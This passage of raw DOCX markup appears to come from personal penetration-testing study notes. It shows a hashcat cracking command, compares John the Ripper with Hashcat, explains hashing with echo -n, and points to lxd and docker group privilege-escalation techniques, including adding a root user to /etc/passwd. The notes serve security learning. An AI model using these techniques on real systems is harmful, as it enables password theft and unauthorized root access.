          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3200 '&lt;INSERT HASH&gt;'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt --show</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ebuy90mcvw0t" w:id="253"/>
      <w:bookmarkEnd w:id="253"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper vs. Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat and John the Ripper (JtR) are two of the most popular password cracking tools that automate this process. In general, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JtR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is more of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU-based cracking tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which also supports GPUs, while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is mainly a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPU-based cracking tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that also supports CPUs. JtR can be run without any additional drivers using only CPUs for password cracking. Hashcat requires</w:t>
      </w:r>
      <w:hyperlink r:id="rId622">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId623">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">OpenCL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:hyperlink r:id="rId624">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId625">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CUDA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the GPU cracking process. For most algorithms, a GPU is much faster than a CPU since modern GPUs contain thousands of cores, each of which can share part of the workload. However, some slow hashing algorithms (like</w:t>
      </w:r>
      <w:hyperlink r:id="rId626">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId627">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">bcrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) work better on CPUs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h307vitdamef" w:id="254"/>
      <w:bookmarkEnd w:id="254"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When using echo, it's important to use "-n" flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -n option in the echo command tells it not to output the trailing newline character that it normally adds at the end of its output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "secret" | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It actually hashes the string "secret\n" — the newline character (\n) is included in the input to sha256sum.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But when you run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n "secret" | sha256sum</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It hashes exactly the string "secret", without a newline. This produces a different SHA-256 hash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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4A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ku0oqky55w3w" w:id="255"/>
      <w:bookmarkEnd w:id="255"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lxd group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Being in the lxd group (similar to Docker) leads to root. Although the process is kind of long.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId628">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 ippsec video for HTB Tabby which explains the process at the end starting at like 44:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId629">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://angelica.gitbook.io/hacktricks/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the hacktricks they used in the video, but they had to do some debugging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId63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 Hacking Article that walks through how to do it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId631">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/lxd-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E56">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8p8t9kmi4jmt" w:id="256"/>
      <w:bookmarkEnd w:id="256"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/usr/bin/docker" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUDO Exploits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section, we see how to abuse docker compose to add a root user to /etc/passwd and get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E59">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rkptxgmbuouu" w:id="257"/>
      <w:bookmarkEnd w:id="257"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting Root from users in Docker Group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2349500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="470" name="image459.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image459.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId632"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2349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E5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example where we saw Docker group was in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId633">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</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E5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First check what images we have available to us:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker image ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="283" name="image278.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image278.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId634"/>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1E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="695"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
